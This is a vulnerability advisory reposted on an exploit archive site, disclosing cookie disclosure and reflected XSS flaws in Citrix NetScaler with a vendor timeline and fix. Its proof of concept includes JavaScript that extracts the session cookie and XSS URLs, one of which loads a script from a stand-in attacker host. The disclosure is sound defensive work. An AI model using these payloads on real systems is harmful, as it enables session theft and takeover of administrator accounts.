exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Citrix Netscaler Disclosure / Cross Site Scripting

Citrix Netscaler Disclosure / Cross Site Scripting
Posted Jul 16, 2014
Authored by S. Viehbock | Site sec-consult.com

Citrix NetScaler Application Delivery Controller and Citrix NetScaler Gateway are susceptible to cookie disclosure and reflective cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
advisories | CVE-2014-4346, CVE-2014-4347
SHA-256 | d1476599affa41b884dec786579a526abb8aa5d7a7e7ce2a41d003a8d5c21aa6

Citrix Netscaler Disclosure / Cross Site Scripting

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SEC Consult Vulnerability Lab Security Advisory < 20140716-2 >
=======================================================================
title: Multiple vulnerabilities
product: Citrix NetScaler Application Delivery Controller
Citrix NetScaler Gateway
vulnerable version: <9.3-62.4
<10.1-126.12
fixed version: >=9.3-62.4
>=10.1-126.12
CVE: CVE-2014-4346, CVE-2014-4347
impact: High
homepage: http://www.citrix.com
found: 2014-01-05
by: Stefan Viehböck
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================

Vendor/product description:
- -----------------------------
"Citrix NetScaler helps organizations build enterprise cloud networks that
embody the characteristics and capabilities that define public cloud services,
such as elasticity, expandability and simplicity. NetScaler brings to
enterprise IT leaders multiple advanced technologies that were previously
available only to large public cloud providers."

"As an undisputed leader of service and application delivery, Citrix NetScaler
solutions are deployed in thousands of networks around the globe to optimize,
secure and control the delivery of all enterprise and cloud services. They
deliver 100 percent application availability, application and database server
offload, acceleration and advanced attack protection. Deployed directly in
front of web and database servers, NetScaler solutions combine high-speed load
balancing and content switching, http compression, content caching, SSL
acceleration, application flow visibility and a powerful application firewall
into a single, easy-to-use platform."

URL: http://www.citrix.com/products/netscaler-application-delivery-controller/overview.html


Business recommendation:
- ------------------------
Attackers can exploit XSS and other vulnerabilities that lead to cookie disclosure
to execute administrative actions.

Affected Systems should be updated as soon as possible.


Vulnerability overview/description:
- -----------------------------------
1) Cookie disclosure
The error handler in the Apache g_soap module prints all of the request header
information including the HTTP Cookie field. This vulnerability can be used in
XSS attacks to gain access to the otherwise well protected (HttpOnly) "SESSID"
cookie of an administrator.

2) Reflected Cross-Site Scripting (XSS)
Citrix Netscaler suffers from multiple reflected Cross-Site Scripting
vulnerabilities, which allow an attacker to steal user information,
impersonate users and perform administrative actions on the appliance.

There are many parameters which are not properly sanitized and thus
vulnerable to XSS.


Proof of concept:
- -----------------
1) Cookie disclosure
A GET request to the SOAP handler returns the following information:

GET /soap HTTP/1.1
Host: <host>
*OTHER HEADER FIELDS*

Response:
HTTP/1.1 200 OK
...
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
...
<BODY>
<H1>mod_gsoap Apache SOAP Server Error</H1>
<p><strong>No body received</strong>
...
<br>Cookie: SESSID=*SESSION ID*;
...

In combination with an XSS vulnerability (see 2) an attacker can use the following
code to extract cookies including the SESSID cookie of an administrator:

var request = new XMLHttpRequest();
request.open('GET', '/soap', false);
request.send();
lines=request.responseText.split('<br>')
for (var i in lines){
if (lines[i].indexOf('Cookie')==0){
alert(lines[i]);
break;
}
}

2) Reflected Cross-Site Scripting
Accessing the following URL will include the Javascript code from http://evilattacker/evil.js:
http://<host>/menu/topn?name=";<%2fscript><script+src%3d"http:%2f%2fevilattacker%2fevil.js"><%2fscript>

Other pages do not sanitize user input properly as well:
http://<host>/pcidss/launch_report?type=AA";alert('xss');x="

http://<host>/menu/guiw?nsbrand=AA<"'>AA&protocol=BB<"'>BB&id=CC<"'>CC
Note: Content-Type is application/x-java-jnlp-file, so the injected script code
is not interpreted. However, it is possible to inject arguments into a Java
JNLP file, which might be used in further attacks.


Vulnerable / tested versions:
- -----------------------------
The vulnerabilities have been verified to exist in Citrix NetScaler VPX 10.0,
which was the most recent version at the time of discovery.
According to the vendor versions before 10.1-126.12 and 9.3-62.4 are vulnerable


Vendor contact timeline:
- ------------------------
2014-01-09: Sending advisory and proof of concept exploit via encrypted
channel.
2014-01-17: Vendor acknowledges receipt of advisory.
2014-04-04: Requesting status update.
2014-06-10: Vendor is "in the process of scheduling the release of a security
bulletin".
2014-07-07: Requesting list of affected/non-affected versions CVE-IDs.
2014-07-07: Vendors is "still in the final stages of releasing the bulletin".
2014-07-07: Requesting info about cause of delay.
2014-07-07: Vendor is "still hopeful that the bulletin will be available soon".
2014-07-14: Vendor states that fixed version will be available on July 15/16.
2014-07-16: SEC Consult releases coordinated security advisory.


Solution:
- ---------
Update to a more recent version of Citrix NetScaler.

More information can be found at:
https://support.citrix.com/article/ctx140863


Workaround:
- -----------
No workaround available.


Advisory URL:
- -------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

Interested in working with the experts of SEC Consult?
Write to career@sec-consult.com

EOF Stefan Viehböck / @2014
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/

iQEcBAEBAgAGBQJTxmWgAAoJECyFJyAEdlkKWLYH/0wpELCJemzmkj2HaotFZJtt
4C4/hsHWGbxmi2VbeiwGvYKHtDsw2KBDWlTrVTef3UrBnbAv6jFncTCjOv3eU6Ze
9swUmwxzNB9zqGvhYwEpcO8tSQu0H3xDMvbpKqYvq2qaBSm4YmJyUrDlwwSkCUnq
ycGqzfidkAXoMUu/6wdam5251zXcR33n1KRfr3AH65p/OoOXrvasgY395Cty9zqW
yfBvEIEs845aE/gbjbp40qvroz1dG8Z2LP4ykFWywVme0imgSD6nv/33Z0tDmlcD
f7JjK8F7R7Q8l4J54n0iclXCWZhoS3pfabd60NXMzMmxroMuksmiNycm7yLGfe4=
=KicK
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close